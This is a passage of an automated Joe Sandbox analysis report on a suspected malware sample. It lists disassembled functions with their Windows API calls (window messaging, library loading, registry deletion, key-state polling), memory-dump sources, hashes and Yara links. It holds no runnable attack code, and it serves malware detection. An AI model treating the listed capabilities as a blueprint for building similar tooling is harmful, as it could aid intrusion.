                                                                                                                                • Opcode Fuzzy Hash: 63893267b6f32bf5d54f6d3d5f59a8d40da980fe647a91c3477439d4651d0c03
                                                                                                                                • Instruction Fuzzy Hash: F331CF71409344ABD321EB60DC46BDF77E9BF48360F40451BF289820A1DB74AA88EB92
                                                                                                                                Function 00F78EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F2C657
                                                                                                                                  • Part of subcall function 00F2C619: GetStockObject.GDI32(00000011), ref: 00F2C66B
                                                                                                                                  • Part of subcall function 00F2C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2C675
                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F78F69
                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00F78F70
                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F78F85
                                                                                                                                • DestroyWindow.USER32(?), ref: 00F78F8D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                • String ID: SysAnimate32
                                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                                • Opcode ID: 29e0cd7938078709d378dd6e3c2e60d83eddb36938f5555c0d4b8f4a3f4a6907
                                                                                                                                • Instruction ID: 53ec575615a041119e88f5fa5ca3bcdbebe06e1fdb1cf5d85e966cb059a511a1
                                                                                                                                • Opcode Fuzzy Hash: 29e0cd7938078709d378dd6e3c2e60d83eddb36938f5555c0d4b8f4a3f4a6907
                                                                                                                                • Instruction Fuzzy Hash: 01217F71640205AFEB104F64DC48EFB3BAAEB493B4F108616FA18D7190CB71DC52BB61
                                                                                                                                Function 00F5E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00F5E392
                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00F5E3E6
                                                                                                                                • __swprintf.LIBCMT ref: 00F5E3FF
                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00FADBF0), ref: 00F5E43D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                • String ID: %lu
                                                                                                                                • API String ID: 3164766367-685833217
                                                                                                                                • Opcode ID: 2b0a0f5cbff6296e227063c40f2900a085df361ca8ed47be4a2fe564744be1c7
                                                                                                                                • Instruction ID: 4f3d20efcfd69edae943eb346ed84f5eb498aef0b38fb697e37f69accc0a3980
                                                                                                                                • Opcode Fuzzy Hash: 2b0a0f5cbff6296e227063c40f2900a085df361ca8ed47be4a2fe564744be1c7
                                                                                                                                • Instruction Fuzzy Hash: D9216D35A40208AFCB10EB64DC85EEE77B8EF89715B104069FA09D7251D635DA45EBA0
                                                                                                                                Function 00F4D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                  • Part of subcall function 00F4D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F4D640
                                                                                                                                  • Part of subcall function 00F4D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4D653
                                                                                                                                  • Part of subcall function 00F4D623: GetCurrentThreadId.KERNEL32 ref: 00F4D65A
                                                                                                                                  • Part of subcall function 00F4D623: AttachThreadInput.USER32(00000000), ref: 00F4D661
                                                                                                                                • GetFocus.USER32 ref: 00F4D7FB
                                                                                                                                  • Part of subcall function 00F4D66C: GetParent.USER32(?), ref: 00F4D67A
                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00F4D844
                                                                                                                                • EnumChildWindows.USER32(?,00F4D8BA), ref: 00F4D86C
                                                                                                                                • __swprintf.LIBCMT ref: 00F4D886
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                • String ID: %s%d
                                                                                                                                • API String ID: 1941087503-1110647743
                                                                                                                                • Opcode ID: 336fab4ac0eb64f0f269aebead95ce27e42491a2f0c95348bbcfdb5b76db18f9
                                                                                                                                • Instruction ID: 47d7c6d9527c3e3b8347aabe06e450b96815e0d1762266afd3dec776ba75dcde
                                                                                                                                • Opcode Fuzzy Hash: 336fab4ac0eb64f0f269aebead95ce27e42491a2f0c95348bbcfdb5b76db18f9
                                                                                                                                • Instruction Fuzzy Hash: 911193759002096BDF11BF64CC86FEA3B79AF44714F0040B9FE0DAA186DBB89945AB71
                                                                                                                                Function 00F71836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F718E4
                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F71917
                                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F71A3A
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00F71AB0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2364364464-0
                                                                                                                                • Opcode ID: d17e98d4c61acda66ae88139fe9a4caa5bd8e7f9dd8f184b8f73fc8a8a9db037
                                                                                                                                • Instruction ID: 650b39f9a1710491f815ebeecdf73906de5d6e2943dc8ccfd739951dc2a76b5c
                                                                                                                                • Opcode Fuzzy Hash: d17e98d4c61acda66ae88139fe9a4caa5bd8e7f9dd8f184b8f73fc8a8a9db037
                                                                                                                                • Instruction Fuzzy Hash: 1B817371A40214ABDB10DF64CC86BAD7BF5BF48720F14C059F909AF382D7B8E9459B91
                                                                                                                                Function 00F70579 Relevance: 7.6, APIs: 5, Instructions: 149libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00F705DF
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,?,?,?,00000004,00000004,?,?), ref: 00F7066E
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,00000000,00000004,00000004,?,?), ref: 00F7068C
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,?,?,?,00000041,00000004), ref: 00F706D2
                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 00F706EC
                                                                                                                                  • Part of subcall function 00F2F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00F5AEA5,?,?,00000000,00000008), ref: 00F2F282
                                                                                                                                  • Part of subcall function 00F2F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00F5AEA5,?,?,00000000,00000008), ref: 00F2F2A6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2773980681-0
                                                                                                                                • Opcode ID: 2fd27a858ba6d34a5d2a40db816b1e4b2a5b635c86666220c0729cd1a457e712
                                                                                                                                • Instruction ID: 22403bbec42bfddb9880c3184ee98234e98fb0f8d6245963e97f0228754a2e21
                                                                                                                                • Opcode Fuzzy Hash: 2fd27a858ba6d34a5d2a40db816b1e4b2a5b635c86666220c0729cd1a457e712
                                                                                                                                • Instruction Fuzzy Hash: 32516C76A00205DFCB00EFA8C890AEDB7B5FF49310B14C066E959AB351DB34ED85EB91
                                                                                                                                Function 00F7CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ecf02273299b63f3ba176434031d2c17f03b68701c12b66f358a3365296315ec
                                                                                                                                • Instruction ID: 5b7e5fdac4b7dd74ac19e4f7defb5b88d4c0bc0c4da4ad1bb352e3ca528c8d08
                                                                                                                                • Opcode Fuzzy Hash: ecf02273299b63f3ba176434031d2c17f03b68701c12b66f358a3365296315ec
                                                                                                                                • Instruction Fuzzy Hash: 7A41DE36D00148ABD721DF78CC49FA9BBA9AB49320F15825BF91DA72D1C730AD40FA91
                                                                                                                                Function 00F61726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F617D4
                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F617FD
                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F6183C
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F61861
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F61869
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1389676194-0
                                                                                                                                • Opcode ID: cb3bb55e4328a1af40c52521b3b5374af3ace28d0062090785b0d6a227297485
                                                                                                                                • Instruction ID: f694bd35c5f76cc5f4fbb50c925f672f100797247b6c5c2f9e59f920fa2c29d8
                                                                                                                                • Opcode Fuzzy Hash: cb3bb55e4328a1af40c52521b3b5374af3ace28d0062090785b0d6a227297485
                                                                                                                                • Instruction Fuzzy Hash: 91411B35A00209DFCB11EF64C991EADBBF5FF48350B188099E906AB361DB35ED41EB91
                                                                                                                                Function 00F2B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetCursorPos.USER32(000000FF), ref: 00F2B749
                                                                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 00F2B766
                                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00F2B78B
                                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 00F2B799
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4210589936-0
                                                                                                                                • Opcode ID: 2442b1d3fcbd4b473c8c4acaf718a30965fa6b8adcfa31a188e06b7654890b48
                                                                                                                                • Instruction ID: 38775b295f443a88d0fd0f57f240a2aecb58bc717e46dbc0b638b024c0c3286c
                                                                                                                                • Opcode Fuzzy Hash: 2442b1d3fcbd4b473c8c4acaf718a30965fa6b8adcfa31a188e06b7654890b48
                                                                                                                                • Instruction Fuzzy Hash: 31415F35A04119FFDF159F64D884AE9BBB5BB45374F20431AFC2992290C734AD50EB91
                                                                                                                                Function 00F73C63 Relevance: 7.6, APIs: 5, Instructions: 100registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00F73C92
                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00F73D71
                                                                                                                                  • Part of subcall function 00F73C63: FreeLibrary.KERNEL32(?), ref: 00F73D2B
                                                                                                                                  • Part of subcall function 00F73C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F73D4E
                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F73D16
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumFreeLibrary$Delete
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1943264518-0
                                                                                                                                • Opcode ID: aa007f5aca5f3b528c86e2583112f690bdf7b76db162f0d6f66cef8c42a00a61
                                                                                                                                • Instruction ID: 2af1d29d0e2cd4f3d645182beae3510c21cf963ed1cfef4c73b31d2965a0db29
                                                                                                                                • Opcode Fuzzy Hash: aa007f5aca5f3b528c86e2583112f690bdf7b76db162f0d6f66cef8c42a00a61
                                                                                                                                • Instruction Fuzzy Hash: 1B311872D0121DBFDB259B94DC89AFEB7BCEF08310F10416AA516A2150E7749F48AB61
                                                                                                                                Function 00F4C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00F4C156
                                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00F4C200
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F4C208
                                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00F4C216
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F4C21E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3382505437-0
                                                                                                                                • Opcode ID: 3800bf6892041e9b5afc52a7d74ddba757ebd0f853853ff593b714d27b14d250
                                                                                                                                • Instruction ID: f069cbf015a44a8a0d2663d78ce897a912321ed8728d25953cb5a962ffc962aa
                                                                                                                                • Opcode Fuzzy Hash: 3800bf6892041e9b5afc52a7d74ddba757ebd0f853853ff593b714d27b14d250
                                                                                                                                • Instruction Fuzzy Hash: C231AE7290121DEBDB04CFA8DD4DA9E3FB5EB44325F104229FD25AB1D2C7B09954EB90
                                                                                                                                Function 00F4E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00F4E9CD
                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F4E9EA
                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F4EA22
                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F4EA48
                                                                                                                                • _wcsstr.LIBCMT ref: 00F4EA52
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3902887630-0
                                                                                                                                • Opcode ID: 2607c9c372a6450618d592c3d614644fed4445334ea89baa125d56c57c5eac74
                                                                                                                                • Instruction ID: c0be2546a7a3052927834e5127ed52f1e60e0de373357446bdefbbcf398cb728
                                                                                                                                • Opcode Fuzzy Hash: 2607c9c372a6450618d592c3d614644fed4445334ea89baa125d56c57c5eac74
                                                                                                                                • Instruction Fuzzy Hash: 4521F6726042047AEB25AB79DC49E7F7FA8FF45760F10802AFC09CA191EE69DC40B660
                                                                                                                                Function 00F7DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00F7DCC0
                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F7DCE4
                                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F7DCFC
                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00F7DD24
                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00F6407D,00000000), ref: 00F7DD42
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
